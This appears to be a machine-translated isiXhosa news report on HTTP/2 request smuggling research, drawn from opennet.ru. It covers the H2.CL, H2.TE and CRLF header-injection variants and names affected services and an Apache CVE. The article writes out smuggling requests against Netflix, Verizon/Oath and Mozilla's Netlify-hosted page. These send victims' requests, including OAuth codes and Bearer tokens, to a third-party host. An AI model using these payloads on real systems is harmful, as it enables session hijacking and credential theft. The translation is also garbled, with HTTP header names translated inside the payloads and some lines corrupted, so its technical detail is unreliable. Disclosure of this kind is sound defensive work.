Iinkqubo zewebhu apho isiphelo sangaphambili samkela uxhulumaniso nge-HTTP / 2 kwaye idlulisele kwi-backend nge-HTTP/1.1 ibonakaliswe kwintlupheko entsha yokuhlaselwa kwe-"HTTP Request Smuggling", evumela, ngokuthumela izicelo zabaxhasi ezilungiselelwe ngokukodwa, ukuba Ingene kwimixholo yezicelo zabanye abasebenzisi eziqhubekekiswe ngendlela efanayo phakathi kwe-frontend kunye ne-backend. Uhlaselo lungasetyenziselwa ukufaka ikhowudi yeJavaScript enobungozi kwiseshoni enewebhusayithi esemthethweni, iinkqubo zothintelo lokufikelela kunye nokuthintela iiparamitha zokuqinisekisa.
Ingxaki ichaphazela i-web proxies, i-balancers yomthwalo, i-accelerators yewebhu, iinkqubo zokuhanjiswa komxholo kunye nolunye ulungelelwaniso apho izicelo zithunyelwa kwakhona kwi-front-end-backend. Umbhali wophononongo ubonise ukuba kunokwenzeka ukuba ahlasele iinkqubo zeNetflix, iVerizon, iBitbucket, iNetlify CDN kunye ne-Atlassian, kwaye ifumene i-56 yeedola eziliwaka kwiinkqubo zokuvuza ukuchonga ubuthathaka. Ingxaki iphinde yaqinisekiswa kwiimveliso zeF5 Networks. Ingxaki ichaphazela ngokuyinxenye i-mod_proxy kwiseva ye-Apache ye-Apache (CVE-2021-33193), ukulungiswa kulindeleke kwinguqulo 2.4.49 (abaphuhlisi baziswe ngengxaki ekuqaleni kukaMeyi kwaye banikwa iinyanga ezi-3 ukuyilungisa). Kwi-nginx, ukukwazi ukucacisa ngaxeshanye "Ubude boMxholo" kunye ne "Transfer-Encoding" izihloko zavalwa ekukhululweni kokugqibela (1.21.1). Izixhobo zokuhlasela sele zibandakanyiwe kwi-Toolkit yeBurp kwaye ziyafumaneka ngendlela yolwandiso lweTurbo Intruder.
Umgaqo wokusebenza kwendlela entsha yezicelo zokutshata kwitrafikhi iyafana nokuba sesichengeni okuchongwe ngumphandi ofanayo kwiminyaka emibini edlulileyo, kodwa kunqunyelwe kwimida engaphambili eyamkela izicelo nge-HTTP/1.1. Masikhumbule ukuba kwi-frontend-backend scheme, izicelo zabaxhasi zifunyenwe yi-node eyongezelelweyo - i-frontend, emisela uxhulumaniso olude lwe-TCP kunye ne-backend, eqhuba ngokuthe ngqo izicelo. Ngolu xhulumaniso oluqhelekileyo, izicelo ezivela kubasebenzisi abahlukeneyo zihlala zihanjiswa, ezilandela ikhonkco emva kwenye, zihlulwe ngendlela ye-HTTP protocol.
Uhlaselo lwakudala "lwe-HTTP Cela lokuThutyeleziswa" lwalusekwe kwinto yokuba abaphambili kunye nabasemva batolika ukusetyenziswa kweeheader zeHTTP "Ubude bomxholo" (imisela ubungakanani bedatha kwisicelo) kunye ne "Transfer-Encoding: chunked" (ivumela ubungakanani bedatha kwisicelo). idatha kufuneka idluliselwe kwiindawo) ngokwahlukileyo. Umzekelo, ukuba indawo engaphambili ixhasa kuphela "Ubude boMxholo" kodwa ayihoyi "Ugqithiselo-Khowudi: i-chunked", ngoko umhlaseli angathumela isicelo esiqulathe zombini "Ubude boMxholo" kunye no "Ugqithiso-Khowudiyo: i-chunked", kodwa ubungakanani "Ubude-Ubude" abuhambelani nobungakanani betsheyini eliqhekezayo. Kule meko, i-frontend iya kuqhuba kwaye iqondise isicelo kwakhona ngokuhambelana ne "Content-Length", kwaye i-backend iya kulinda ukugqitywa kwebhloko ngokusekelwe kwi-"Transfer-Encoding: chunked" kunye nomsila oseleyo wesicelo somhlaseli Yiba sekuqaleni kwesicelo somnye umntu esidluliselwe ngokulandelayo.
Ngokungafaniyo neprotocol yombhalo HTTP/1.1, ecazululwe kwinqanaba lomgca, i-HTTP/2 yi-binary protocol kwaye ilawula iibhloko zedatha zobungakanani obuchazwe kwangaphambili. Nangona kunjalo, i-HTTP/2 isebenzisa ii-pseudo-headers ezihambelana neentloko zeHTTP eziqhelekileyo. Kwimeko yokusebenzisana ne-backend nge-HTTP/1.1 protocol, i-frontend iguqulela ezi zihloko ze-pseudo kwiintloko ze-HTTP ezifanayo ze-HTTP/1.1. Ingxaki kukuba i-backend yenza izigqibo malunga nokwahlula umlambo ngokusekelwe kwiintloko ze-HTTP ezibekwe yi-frontend, ngaphandle kokuba nolwazi malunga neeparitha zesicelo sokuqala.
Ngokukodwa, amaxabiso "ubude bomxholo" kunye "nokudlulisa-encoding" anokuhanjiswa ngendlela yeeheader-pseudo, nangona zingasetyenziswanga kwi-HTTP/2, kuba ubungakanani bayo yonke idatha bumiselwe. kwindawo eyahlukileyo. Nangona kunjalo, ngexesha lenkqubo yokuguqula isicelo se-HTTP/2 kwi-HTTP/1.1, ezi zihloko zithwalwa ngaphaya kwaye zinokubhidanisa i-backend. Kukho iinguqu ezimbini eziphambili zokuhlaselwa: i-H2.TE kunye ne-H2.CL, apho i-backend ilahleka ngokugqithiswa kwe-encoding okanye ixabiso lobude bomxholo elingahambelani nobukhulu becala lomzimba wesicelo ofunyenwe yi-frontend nge- Iprotocol yeHTTP/2.
Umzekelo wohlaselo lwe-H2.CL kukucacisa ubungakanani obungalunganga kumxholo-ubude be-pseudo-header xa uthumela isicelo se-HTTP/2 kwiNetflix. Esi sicelo sikhokelela ekongezweni kwentloko yeHTTP efanayo Ubude boMxholo xa ufikelela kwi-backend nge-HTTP/1.1, kodwa ekubeni ubungakanani boBubude boMxholo bucaciswe ngaphantsi kweyona nyani, inxalenye yedatha kumsila icutshungulwa njenge isiqalo sesicelo esilandelayo.
Umzekelo, cela i-HTTP/2 :indlela ye-POST :indlela /n :igunya www.netflix.com umxholo-ubude 4 abcdGET /n HTTP/1.1 Umamkeli: 02.rs?x.netflix.com Foo: bar
Kuya kubangela ukuba isicelo sithunyelwe kwi-backend: I-POST /n HTTP/1.1 Umamkeli: www.netflix.com Ubude bomxholo: 4 abcdGET /n HTTP/1.1 Umsingathi: 02.rs?x.netflix.com Foo: bar
Ekubeni i-Content-Length inexabiso le-4, i-backend iya kwamkela kuphela "i-abcd" njengomzimba wesicelo, kwaye yonke i-"GET /n HTTP/1.1..." iya kuqhutyelwa phambili njengesiqalo sesicelo esilandelayo. ehambelana nomnye umsebenzisi. Ngokufanelekileyo, umsinga uya kuba ungasebenzi kwaye ngokuphendula isicelo esilandelayo, isiphumo sokusetyenzwa kwesicelo se-dummy siya kukhutshwa. Kwimeko yeNetflix, ichaza umamkeli weqela lesithathu kwi-"Host:" header kwisicelo esiyidummy kubangele ukuba umxhasi abuyisele impendulo "Indawo: https://02.rs?x.netflix.com/n" kunye kuvunyelwe umxholo ongekho mthethweni ukuba uthunyelwe kumxhasi, kuquka Yenza ikhowudi yeJavaScript yakho kumxholo wesiza seNetflix.
Ukhetho lwesibini lohlaselo (H2.TE) lubandakanya ukufaka endaweni yesihloko esithi “Transfer-Encoding: chunked”. Ukusetyenziswa kwe-encoding-encoding-header pseudo-header kwi-HTTP/2 inqatshelwe yinkcazo kwaye izicelo kunye nayo zimiselwe ukuba ziphathwe njengezingalunganga. Ngaphandle koku, ukuphunyezwa kwe-frontend akuyithathi le mfuneko kwaye ivumele ukusetyenziswa kwe-encoding-encoding-header-pseudo-header kwi-HTTP/2, eguqulwa ibe yintloko ye-HTTP efanayo. Ukuba kukho i-header ethi "Transfer-Encoding", i-backend inokuyithatha njengento ephambili ephezulu kwaye ihlukanise iqhekeza ledatha ngeqhekeza kwimo ye "chunked" usebenzisa iibhloko zobukhulu obahlukeneyo kwifomathi "{size}\r\n{block }\r\n{ubungakanani} \r\n{bhlo}\r\n0", ngaphandle kolwahlulo lokuqala ngokobungakanani bayo.
Ubukho besithuba esinjalo sabonakaliswa ngumzekelo weVerizon. Ingxaki iphathelene ne-portal yokuqinisekisa kunye nenkqubo yolawulo lomxholo, ekwasetyenziswa kwiindawo ezifana ne-Huffington Post kunye ne-Engadget. Umzekelo, isicelo somthengi nge-HTTP/2: :indlela ye-POST :indlela/identitfy/XUI:igunya id.b2b.oath.com transfer-encoding chunked 0 GET /oops HTTP/1.1 Host: psres.net Ubude boMxholo: 10 x=
Isiphumo sokuthumela isicelo se-HTTP/1.1 kwi-backend: POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Host: psres. Umxholo womnatha- Ubude: 10x=
Umva, emva koko, awuwuhoyanga umxholo othi "Ubude boMxholo" kwaye wenza ulwahlulo lwangaphakathi olusekwe ku "Transfer-Encoding: chunked". Ngokwenza, uhlaselo lwenze ukuba kube lula ukuhambisa izicelo zabasebenzisi kwiwebhusayithi yabo, kubandakanya ukwamkela izicelo ezinxulumene nokuqinisekiswa kwe-OAuth, iiparameters eziboniswe kwi-header ye-Referer, kunye nokulinganisa iseshoni yokuqinisekisa kunye nokuqalisa inkqubo yomsebenzisi ukuthumela iziqinisekiso. kumhlaseli. GET /b2blanding/show/oops HTTP/1.1 Umamkeli: psres.net Umbekiseli: https://id.b2b.oath.com/?…&code=secret GET / HTTP/1.1 Umamkeli: psres.net Ugunyaziso: Umthwali eyJhcGwiOiJIUzI1GicCI1sIkIk6…
Ukuhlasela uphunyezo lwe-HTTP/2 olungavumeli ukudluliswa kwe-encoding pseudo-header ukuba ichazwe, enye indlela iye yacetywayo ebandakanya ukubeka endaweni yesihloko esithi "Transfer-Encoding" ngokuyincamathisela kwezinye iiheader-pseudo-header ezahlulwe ngumbhalo omtsha ( xa iguqulelwe kwi-HTTP/1.1 kule meko idala iiheader ezimbini ezahlukeneyo zeHTTP).
Ngokomzekelo, i-Atlassian Jira kunye ne-Netlify CDN (esetyenziselwa ukukhonza iphepha lokuqala le-Mozilla kwi-Firefox) bachatshazelwa yile ngxaki. Ngokukodwa, isicelo se-HTTP/2 :indlela ye-POST :indlela / :igunya start.mozilla.org foo b\r\n transfer-encoding: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Umamkeli : ububi-netify-domain\r\n Ubude-Ubude: 5\r\n \r\nx=
kubangele ukuba i-HTTP/1.1 POST / HTTP/1.1 isicelo sithunyelwe kumqolo\r\n Umamkeli: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content-Length : 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Umamkeli: ububi-netlify-domain\r\n Ubude-Ubude: 5\r\n \r \nx=
Enye inketho yokubeka endaweni yesihloko esithi "Transfer-Encoding" yayikukuyincamathisela kwigama lenye i-pseudo-header okanye kumgca onendlela yesicelo. Umzekelo, xa ufikelela kwi-Atlassian Jira, igama le-pseudo-header "foo:bar\r\ntransfer-encoding" enexabiso elithi "chunked" ibangele ukuba kufakwe okubhalwe ngasentla kweHTTP "foo:bar" kunye no "transfer-encoding: chunked" ukuba zongezwe. , kunye nokuchaza ipseudo-header ":indlela" ixabiso "GET / HTTP/1.1\r\nTransfer-encoding: chunked" yaguqulelwa ku "GET / HTTP/1.1\r\ntransfer-encoding: chunked".
Umphandi ochonge ingxaki kwakhona ucebise indlela yokucela i-tunneling yokuhlasela i-frontends, apho idilesi nganye ye-IP iseka uxhulumaniso olwahlukileyo kwi-backend kunye ne-traffic evela kubasebenzisi abahlukeneyo ayixutywanga. Indlela ecetywayo ayikuvumeli ukuphazamisa izicelo zabanye abasebenzisi, kodwa yenza kube nokwenzeka ukutyhefa i-cache ekwabelwana ngayo echaphazela ukusetyenzwa kwezinye izicelo, kwaye ivumela ukutshintshwa kwezihloko ze-HTTP zangaphakathi ezisetyenziselwa ukudlulisa ulwazi lwenkonzo ukusuka kwi-frontend ukuya ngasemva ( umzekelo, xa uqinisekisa kwicala le-frontend kwi Izihloko ezinjalo zingathumela ulwazi malunga nomsebenzisi wangoku kwi-backend). Njengomzekelo wokusebenzisa indlela ekusebenzeni, usebenzisa i-cache poisoning, kwakunokwenzeka ukufumana ulawulo kumaphepha kwinkonzo yeBitbucket.
umthombo: opennet.ru